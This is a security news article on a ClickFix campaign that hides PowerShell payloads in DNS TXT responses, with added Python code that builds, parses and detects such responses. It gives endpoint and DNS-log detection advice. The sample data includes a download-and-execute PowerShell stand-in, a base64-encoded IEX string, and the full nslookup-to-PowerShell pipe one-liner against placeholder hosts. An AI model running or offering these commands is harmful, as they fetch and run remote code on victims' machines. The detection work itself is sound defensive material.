Microsoft Warns: ClickFix Attackers Are Now Hiding Malware Inside DNS Traffic

Attackers are now delivering malware inside DNS responses. All it takes is one command typed by the victim.

Dateline: February 16, 2026


Hackers Are Using Your DNS Against You—And You Won't See It Coming

ClickFix has been around for two years. The concept is almost embarrassingly simple — trick someone into typing a command into their own computer, and let them do the attacker's dirty work. Security teams got familiar with it. Defenders started watching for it.

So the attackers changed it.

Microsoft Threat Intelligence disclosed a new variant this week that routes malicious payloads through DNS — a first for ClickFix, and a real headache for anyone trying to detect it.


What Happened?

In the newly observed campaign, victims are told to run a command that uses nslookup to query a DNS server the attacker controls, rather than the resolver their system is configured with. The server's DNS response (a TXT record, which can carry arbitrary text) contains a malicious PowerShell script. nslookup itself only prints what it receives; the rest of the pasted one-liner hands that text to PowerShell, which executes it on the device.

The attack kicks off through the Windows Run dialog. Once executed, the nslookup command contacts the threat actor's server, which sends back a second-stage PowerShell payload. That payload pulls down a ZIP archive carrying a Python runtime and a set of malicious scripts that quietly map out the infected device and its domain.

From there, the malware digs in. It creates a VBScript file and a startup shortcut so it relaunches every time the machine boots. The final payload is ModeloRAT — a remote access trojan that hands attackers full control of the compromised system.

What makes this different from every prior ClickFix campaign is the channel. Previous attacks delivered payloads over HTTP. This one uses DNS — letting attackers swap out payloads on the fly while their traffic blends in with normal network activity.
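To make the channel concrete, here is an added example written for this article (not Microsoft's code, and not the campaign's real payload): it packs a constructed PowerShell stand-in into a hand-built DNS TXT answer, parses it back the way a client would, and applies a heuristic that separates such answers from the SPF-style TXT records workstations legitimately see. The domain, IP address and script text are all made up; the 255-byte character-string limit and the base64-over-UTF-16LE form that PowerShell's -EncodedCommand uses are real details the heuristic has to handle.

```python
"""Added example: a PowerShell payload inside a DNS TXT answer, and a
heuristic that flags it. Names, IPs and the script are constructed."""
import base64
import re
import struct

# Constructed stand-in for a second-stage script; it is never executed here.
SAMPLE_PAYLOAD = (
    "$u='http://198.51.100.7/stage2.zip';"
    "Invoke-WebRequest -Uri $u -OutFile $env:TEMP\\s.zip;"
    "Expand-Archive $env:TEMP\\s.zip $env:TEMP\\s;"
    "Start-Process ($env:TEMP+'\\s\\python\\python.exe') ($env:TEMP+'\\s\\main.py')"
)
# Same idea encoded the way -EncodedCommand expects (base64 over UTF-16LE),
# which defeats naive string matching on the wire.
ENCODED_PAYLOAD = base64.b64encode(
    "Invoke-Expression (Invoke-WebRequest 'http://198.51.100.7/a').Content"
    .encode("utf-16-le")).decode("ascii")

def encode_name(name: str) -> bytes:
    """DNS wire-format name: length-prefixed labels, zero-terminated."""
    labels = name.strip(".").split(".")
    return b"".join(struct.pack("B", len(l)) + l.encode("ascii") for l in labels) + b"\x00"

def build_txt_response(name: str, text: str, txid: int = 0x1234) -> bytes:
    """Minimal DNS response with one TXT answer. TXT RDATA is a sequence of
    <len><bytes> character-strings of at most 255 bytes each, so a longer
    script is split and the client must concatenate the pieces."""
    data = text.encode("utf-8")
    chunks = [data[i:i + 255] for i in range(0, len(data), 255)]
    rdata = b"".join(struct.pack("B", len(c)) + c for c in chunks)
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR=1, RD, RA
    question = encode_name(name) + struct.pack("!HH", 16, 1)    # TYPE TXT, class IN
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 16, 1, 60, len(rdata)) + rdata
    return header + question + answer

def skip_name(msg: bytes, off: int) -> int:
    """Offset just past a name, handling compression pointers (0xC0xx)."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:
            return off + 2
        off += 1 + length

def parse_txt_answers(msg: bytes) -> list[str]:
    """Reassemble the text of every TXT RR in the answer section."""
    _, _, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qdcount):
        off = skip_name(msg, off) + 4  # skip QTYPE and QCLASS
    texts = []
    for _ in range(ancount):
        off = skip_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype != 16:
            continue
        pos, parts = 0, []
        while pos < len(rdata):          # walk the character-strings
            n = rdata[pos]
            parts.append(rdata[pos + 1:pos + 1 + n])
            pos += 1 + n
        texts.append(b"".join(parts).decode("utf-8", "replace"))
    return texts

SUSPICIOUS = re.compile(
    r"(Invoke-WebRequest|Invoke-Expression|\bIEX\b|Start-Process|DownloadString|"
    r"FromBase64String|Expand-Archive|\$env:)", re.I)

def txt_looks_like_payload(text: str) -> bool:
    """True if the TXT data carries PowerShell download/execute primitives,
    in the clear or inside a base64 blob (decoded as UTF-8 and UTF-16LE)."""
    if SUSPICIOUS.search(text):
        return True
    for blob in re.findall(r"[A-Za-z0-9+/]{64,}={0,2}", text):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
        except ValueError:
            continue
        if any(SUSPICIOUS.search(raw.decode(enc, "ignore")) for enc in ("utf-8", "utf-16-le")):
            return True
    return False

def demo() -> dict:
    """Round-trip the stand-in through the wire format and score it beside SPF."""
    texts = parse_txt_answers(build_txt_response("update.example-cdn.test", SAMPLE_PAYLOAD))
    return {
        "roundtrip": texts == [SAMPLE_PAYLOAD],
        "clear_flagged": txt_looks_like_payload(texts[0]),
        "encoded_flagged": txt_looks_like_payload(ENCODED_PAYLOAD),
        "spf_flagged": txt_looks_like_payload("v=spf1 include:_spf.example.test -all"),
    }
```

The point of the chunking logic is that a script longer than 255 bytes arrives as several character-strings in one record, so a detector that inspects only the first string, or only the response length, misses most of it; the heuristic is intentionally crude and is a starting point for tuning against the TXT traffic your own environment produces.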


What's the Impact?

Two problems for defenders: detection gets harder, and the attack surface gets wider.

By stashing payloads inside DNS records, attackers skip hosting malicious files on web servers where URL filters or firewalls might catch them. And because the pasted command names the server to query, the lookup goes straight out on port 53 instead of through the corporate resolver, so whatever filtering that resolver applies never sees it. Some variants point the query at public DNS resolvers for the same effect. Either way, it only works where workstations are allowed to reach arbitrary DNS servers on the internet.

That's not even the biggest issue. The attack works because it exploits how people think about troubleshooting steps. The instructions look like something an IT team might actually send. Victims run the command because it looks routine — not because they were fooled by a poorly designed phishing page.

The resolver angle carries a wider lesson, too. An attacker who controls a victim's DNS resolver can redirect banking sites to pixel-perfect phishing pages, serve malicious software updates from hosts that appear to belong to trusted vendors, and collect whatever credentials and session tokens are entered on those lookalike pages. That is a different situation from this campaign, where the attacker's server answers a single one-off lookup and the victim's configured resolver is left alone, but it shows why DNS is such attractive infrastructure to control. This isn't theoretical: it's what the infrastructure is designed to do.

Nation-state groups have taken notice. ClickFix campaigns aren't just a criminal tool anymore. They're being picked up for espionage and ransomware operations at scale.


How to Avoid This

No single fix covers everything here, but there are concrete steps that reduce real exposure.

On endpoints: don't rely on PowerShell's execution policy, which is a safety rail rather than a security boundary (any command line can override it with -ExecutionPolicy Bypass). Use Constrained Language Mode, script block logging and application control (AppLocker or WDAC) that only allows approved executables, so a ClickFix payload has less to work with once it runs. Block the Windows Run dialog for standard users where policy allows. For detection, the Run dialog records what was typed under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and a PowerShell or cmd process whose parent is explorer.exe and whose command line contains nslookup is a pattern worth alerting on.

On the network side: turn on DNS query logging and actually review it, looking for TXT queries from workstations, oversized TXT answers, and queries sent to servers other than the corporate resolvers. Bear in mind that a lookup aimed directly at an attacker's server never reaches the corporate resolver, so the resolver's logs will not show it; that telemetry has to come from the endpoint or from egress traffic, and blocking outbound port 53 from everything except the resolvers removes the channel entirely. Deploy protective DNS services that can flag and block suspicious domain resolutions before they complete. Threat intelligence feeds tracking active ClickFix infrastructure can give teams a head start.
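The endpoint and network detections described in the two paragraphs above, as an added example that is not Microsoft's detection logic or any product's rule set: it runs two checks over constructed Sysmon-style process-creation records and constructed DNS log lines. The field names, the key=value log format, the approved resolver range and the sample command lines are assumptions made for the example.

```python
"""Added example: offline checks for the ClickFix-over-DNS pattern over
constructed process events and DNS log lines. All fields are assumed."""
import re
import shlex
from ipaddress import ip_address, ip_network

# Assumed corporate resolver range; anything else is treated as unapproved.
APPROVED_RESOLVERS = [ip_network("10.0.0.0/8")]
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")
TXT_FLAG = re.compile(r"-(?:type|q|querytype)=txt", re.I)

# Constructed Sysmon Event ID 1-style records (Image, ParentImage, CommandLine).
PROCESS_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "nslookup -type=txt update.example-cdn.test '
                    '203.0.113.9 | powershell -Command -"'},
    {"Image": r"C:\Windows\System32\nslookup.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "nslookup -type=txt update.example-cdn.test 203.0.113.9"},
    {"Image": r"C:\Windows\System32\nslookup.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "nslookup mail.example.test"},
]

# Constructed DNS log lines in an assumed key=value format.
DNS_LOG = [
    "2026-02-16T10:00:01Z client=10.0.0.5 qname=update.example-cdn.test qtype=TXT server=203.0.113.9 rdlen=812",
    "2026-02-16T10:00:02Z client=10.0.0.5 qname=_dmarc.example.test qtype=TXT server=10.0.0.2 rdlen=96",
    "2026-02-16T10:00:03Z client=10.0.0.9 qname=www.example.test qtype=A server=10.0.0.2 rdlen=4",
]
KV = re.compile(r"(\w+)=(\S+)")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def resolver_is_approved(server: str) -> bool:
    """Hostnames cannot be checked offline, so they count as unapproved."""
    try:
        ip = ip_address(server)
    except ValueError:
        return False
    return any(ip in net for net in APPROVED_RESOLVERS)

def explicit_server(cmdline: str):
    """nslookup's second positional argument, if present, is the server to query."""
    args = [a for a in shlex.split(cmdline, posix=False) if not a.startswith("-")]
    return args[2] if len(args) >= 3 else None

def flag_process(ev: dict) -> list[str]:
    """Endpoint rule: nslookup TXT lookups from a shell, and shells launched
    from explorer.exe (the Run dialog) that embed such a lookup."""
    img, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    reasons = []
    if img == "nslookup.exe" and parent in SHELLS and TXT_FLAG.search(cmd):
        reasons.append("nslookup TXT query spawned from a shell")
        srv = explicit_server(cmd)
        if srv and not resolver_is_approved(srv):
            reasons.append(f"explicit non-corporate resolver {srv}")
    if img in SHELLS and parent == "explorer.exe" and "nslookup" in cmd.lower() and TXT_FLAG.search(cmd):
        reasons.append("shell launched from explorer with inline nslookup TXT lookup")
    return reasons

def flag_dns_line(line: str, max_txt_rdlen: int = 512) -> list[str]:
    """Network rule: TXT queries to unapproved servers and oversized TXT answers."""
    f = dict(KV.findall(line))
    reasons = []
    if f.get("qtype") == "TXT":
        if not resolver_is_approved(f.get("server", "")):
            reasons.append(f"TXT query sent to non-corporate resolver {f.get('server')}")
        if int(f.get("rdlen", 0)) > max_txt_rdlen:
            reasons.append(f"oversized TXT answer ({f['rdlen']} bytes)")
    return reasons

def run() -> dict:
    """Index of every flagged record, keyed by its position in the sample data."""
    return {
        "process_hits": {i: r for i, ev in enumerate(PROCESS_EVENTS) if (r := flag_process(ev))},
        "dns_hits": {i: r for i, line in enumerate(DNS_LOG) if (r := flag_dns_line(line))},
    }
```

In the sample data the benign nslookup from cmd.exe and the _dmarc TXT lookup to the corporate resolver pass, while the Run-dialog launch and the direct TXT query to 203.0.113.9 are caught by both rules. The oversized-answer threshold is the knob to tune: SPF and DKIM records are normally well under 512 bytes, but check your own baseline before alerting on it.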

Security awareness training needs updating too. Users should know — clearly, not buried in a policy doc — that no real website or IT team will ever ask them to paste something into a Run dialog and hit Enter. Running simulated ClickFix-style phishing exercises is one of the faster ways to build that instinct.

The attack doesn't need an exploit. It needs a person who doesn't think twice. That's the part worth fixing first.